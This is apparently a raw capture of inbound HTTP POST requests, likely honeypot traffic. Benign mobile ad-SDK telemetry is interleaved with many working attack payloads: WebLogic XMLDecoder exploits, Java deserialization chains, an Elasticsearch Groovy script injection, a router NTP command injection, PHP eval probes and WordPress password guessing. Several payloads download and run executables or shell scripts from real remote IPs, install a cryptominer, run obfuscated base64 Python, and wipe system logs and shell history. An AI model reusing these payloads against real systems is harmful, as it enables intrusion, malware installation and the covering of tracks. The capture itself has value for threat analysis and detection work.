Content-Length: 0
Pragma: no-cache
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /sdk HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Host: x.x.x.x:8080
Content-Length: 441
Connection: close
<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=123!@#
POST http://check.proxyradar.com/azenv.php?auth=147369633295&a=PSCMN&i=2733905975&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂0B÷Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î?1Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /invoker/readonly HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1625
Host: x.x.x.x:80
User-Agent: Python-urllib/1.17
¨Ìsr2sun.reflect.annotation.AnnotationInvocationHandlerU ıÀ~•L memberValuestLjava/util/Map;LtypetLjava/lang/Class;xps}
java.util.Mapxrjava.lang.reflect.Proxy·'⁄ ÃCÀLht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapnÂîÇûyîLfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0«óÏ(zó[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;ΩV*Òÿ4ôxpsr;org.apache.commons.collections.functors.ConstantTransformerXvêA±îL iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformeráˡk{|Œ8[iArgst[Ljava/lang/Object;L iMethodNametLjava/lang/String;[ iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;êŒXüs)lxpt
getRuntimeur[Ljava.lang.Class;´◊ÆÀÕZôxpt getMethoduq~vrjava.lang.String†§8z;≥Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~uq~ur[Ljava.lang.String;≠“VÁÈ{Gxpt /bin/basht-ctpython -c "import base64;exec(base64.b64decode('aW1wb3J0IGJhc2U2NCx1cmxsaWIKZm9yIGkgaW4gcmFuZ2UoNSk6CiAgICB0cnk6CiAgICAgICAgZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCdodHRwOi8vay56c3c4LmNjL0FwaS8nKS5yZWFkKCkpKQogICAgICAgIGJyZWFrCiAgICBleGNlcHQ6CiAgICAgICAgcGFzcw=='))"texecuq~vq~/srjava.util.HashMap⁄¡√`—F
loadFactorI thresholdxp?@wxxvrjava.lang.annotation.Retentionxpq~:
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST http://d.applovin.com/device?device_token=MaznYs97JTiqaqEwnZGZ5hoNAbGKHRajj5FMcZF_ODHYTEi_kuVCQ4yNWoT9kVKCYOdmiOu8EBuDlBzDf9dDAcksZAxPMlyVV-CvlM0u7mEUGLyh8g8trSy-C2iSYtXpQsCRhRgeTqA7eY2q-c8xqFHgtRJiJ0jgDFMg8-H0uSU= HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: d.applovin.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 970
{"app_info":{"package_name":"com.virgil.basketball","ic":true,"installed_at":1494391549000,"app_version":"3.6","first_install":"false","applovin_sdk_version":"6.3.2","app_name":"Basketball Mania"},"device_info":{"os":"4.4.4","model":"MI 4LTE","tz_offset":7,"locale":"in_ID","sdk_version":19,"dnt":false,"type":"android","country_code":"ID","revision":"cancro","carrier":"TELKOMSEL","brand":"Xiaomi","orientation_lock":"portrait","idfa":"8776479c-11a4-48e7-8a70-96e640a29187","wvvc":0},"stats":{"ad_req":190,"SubmitData_time":505331,"FetchNextAd_time":2935170,"RepeatSubmitData_time":380819,"RenderAd_time":1611115,"TaskDispatchPostback_time":380919,"ad_session_start":1496230017843,"FetchNextAd_count":188,"RepeatFetchNextAd_time":646724,"cached_files_expired":66,"RepeatFetchNextAd_count":25,"RepeatSubmitData_count":21,"TaskDispatchPostback_count":40,"TaskCollectAdvertisingId_time":21556,"RenderAd_count":73,"SubmitData_count":36,"TaskCollectAdvertisingId_count":40}}
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST http://api.vungle.com/api/v4/requestAd HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 325
{"demo":{},"pubAppId":"5811c733a1e0773e1a000028","deviceInfo":{"dim":{"width":1080,"height":1920},"platform":"android","model":"Xiaomi,MI 4LTE","connection":"mobile","osVersion":"4.4.4","networkOperator":"TELKOMSEL","volume":0.26666668,"soundEnabled":false,"isSdCardAvailable":1},"ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106
{"start":1495362169077,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂ØmÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îäY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 848
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/downloader.exe','C:/Windows/temp/wlanexts.exe');start C:/Windows/temp/wlanexts.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=111111
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å`äQ<Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149613607773&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://cm.adkmob.com/getCatalog/?android_id=6ccc52a8048214f&cver=51424845&mcc=510&model=MI+4LTE&brand=Xiaomi&os_version=19&lan=in&country=id&ch=2010002546&resolution=1920x1080&net=2&k=1 HTTP/1.1
Content-Length: 768
Host: cm.adkmob.com
Connection: Keep-Alive
Äë,_—úãd®3OÎ¥î(µ·K'7KÎô»á5ɶ¯i∏m[9ÃU`fl˛8≈™‡º∏Â~*øoM-∂ñÑ‘!+é˜S~¡≤«,[=>YŸ@Ï£@Aàvleíé`[ùPqÃD¢≤Á»◊ <4ObWò(ɛ嗶P\˜í‚"&Óœ{xõgB<|È-ÑRœÕ√Œ≤≈µãÒ“?˚MÎ÷¯™bØÆÛ ìaƒUÖaÚå#yÉs£øŒEÔé^ıÓ¥!z≥€ø:öµ®ø˙7á0.‰O∑M∆áE≤vÖ¿ëÖÈ£Oå˙≤hâc \"ç©≥‚MEùÁê:,cÕ≠|k&1&üÏΩdH{[3⁄q*aøœ``µd€s’EÈçñ˙f∂G˝≈?…4‹OHïáÕÓrÀπÿ‹sÀûb˘è3‘ƒ{ÑñkS’ËÄ»>ß’09ÿ}•=Û∫£j
]úhÁ ¨§ VΩfl≥ö«”€ñ∑gVF¡+˚+Ç˙c6≥u∏h˘%⁄“ZX˝≈/_⁄Â’°êB∑7@R1Û†/∂Â/_€—(æ∆˙Rˇb‹@ƒpDÆ~x†<fl˛í\™´Ds’2$ıÂ~; •í»_Ë˝=èSƒú≥>“!∞<®åÄ)–Q:x—0œ&Ç»OOñ“CÒ»-jуDÊ√|ˇÿ3hfl:ø;G¨Ÿ5l¿vºqˆÙáå◊O˘iæ—¥z@Ó–›z•o ù”ÚX?Æ(ú•´¡{=ıaè°‚‚π$˙ìâ¬ñO$ô¿»ˇ˛Æfl{íÓòF}ûÑ8¶˘z>WË∫í´r∆aßqÇL6Ôı≈ÓÙ-∏çEg√ë»4&Û…∂∏∆!u»k?‰Ï∑•øa4⁄<•Hdh`'™]Ñ˚s4«Ó¶Úìù≥â%uÒp‚¢k∑Á¶/Z[~U2§ Œ,'–PWoyÂÄ›0ú¥N◊Hc:Í6ø©éÊÀ*πœO\9‚•ôkj!â PÚÍB«è GÕGœìL€ñ
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache
CFy3yXAVVgfWgC91sm3Ead8gQzm9HcT7SGkbBjcTvb0FtnX83jHVyyON6e5Hf1QXle4AJkzn2de5RN41N5witEU4XgK9P4BhiLydgOlSeoZZ0OOerdX9zqzQ0ntHUE/XhZzXTmwuo7MUxAbmH3FO/CIOQh6lFJgTqqrDTe4p71ey3tEG4DBIAo9GSmk4rAmOOo1fVsUdSydxCch7WYkkXaw8jF9KUXZYvAljksg+2Uc84PisTFkrkZTC1A3p1w9hxa20XQwXVY01WN9XkWZU67lobcTmR9oSj1RCY9FYgHKEianp97c985HgZEHSI8oPyO6AashgrgM9GK2znXvi6V5IUI0XnRz6saCYMwRlRr1PXKnnwgIbZLBzDBRn90MgO59oz3esKH0h2MUounU=
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Host: x.x.x.x
Content-Length: 0
Connection: Keep-Alive
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÖÖ§ŒÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îp2Y›∆√«∆fl
POST /invoker/readonly HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 1564
¨Ìsr2sun.reflect.annotation.AnnotationInvocationHandlerU ıÀ~•L memberValuestLjava/util/Map;LtypetLjava/lang/Class;xps}
java.util.Mapxrjava.lang.reflect.Proxy·'⁄ ÃCÀLht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapnÂîÇûyîLfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0«óÏ(zó[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;ΩV*Òÿ4ôxpsr;org.apache.commons.collections.functors.ConstantTransformerXvêA±îL iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformeráˡk{|Œ8[iArgst[Ljava/lang/Object;L iMethodNametLjava/lang/String;[ iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;êŒXüs)lxpt
getRuntimeur[Ljava.lang.Class;´◊ÆÀÕZôxpt getMethoduq~vrjava.lang.String†§8z;≥Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~ur[Ljava.lang.String;≠“VÁÈ{GxptΩpowershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://222.184.79.11:5317/minerxmr.exe', 'C:\\minerxmr.exe');START C:\\minerxmr.exetexecuq~q~#sq~srjava.lang.Integer‚†§˜Åá8Ivaluexrjava.lang.Numberܨï î‡ãxpsrjava.util.HashMap⁄¡√`—F
loadFactorI thresholdxp?@wxxvrjava.lang.Overridexpq~:
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=7654321
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://tech.lovelyskin.ru/proxyc/engine.php HTTP/1.0
Accept: */*
Referer: http://tech.lovelyskin.ru/proxyc/engine.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: tech.lovelyskin.ru
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache
xrumer=inside
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 416
Cache-Control: no-cache
EKxWk9ieYlveNma5elfwVsqCBpPXMrwNkYz0AdXgmboWpxKMV2+uiuf3a72YUnHcyZu+3uCiH+OiM2HU8jv4C9vkLkJGQ6Ocv7VrACLseBuQjCpTF4r0D2IRYOIlnGBHbq5P2ELWRblydRiE3KWV9xi8M6upAYS9xSM4KxYx88JjL4NimOzlpyyc3cUHrnxlUi+19gFU4a/xzMBGLVtQNfs/HYRCRzlp4Cx5aICtioUVXUkqvE8/ZP98nYeJurv2FoLMYovJJnA6mIR4EqzNAz9eC4SC6GDi5J51Ah/7bHO5If+3op+lFyeASIlYDVTxNVYvoZdmSLGo9luPjJ/Jrq1MdL8RWW52Pw3YGVlVSd1oKwF4ZV30+/9FaxQc0jCDORLPTQRttDj+PiOpIGN1y2bnnZ7Pxg==
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496717505026
X-Umeng-Sdk: Android/6.0.9 PopCat%2F2.1.2+MI+4LTE%2F4.4.4+D2EA899797B039FCD23DDA127C0FE621
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2393
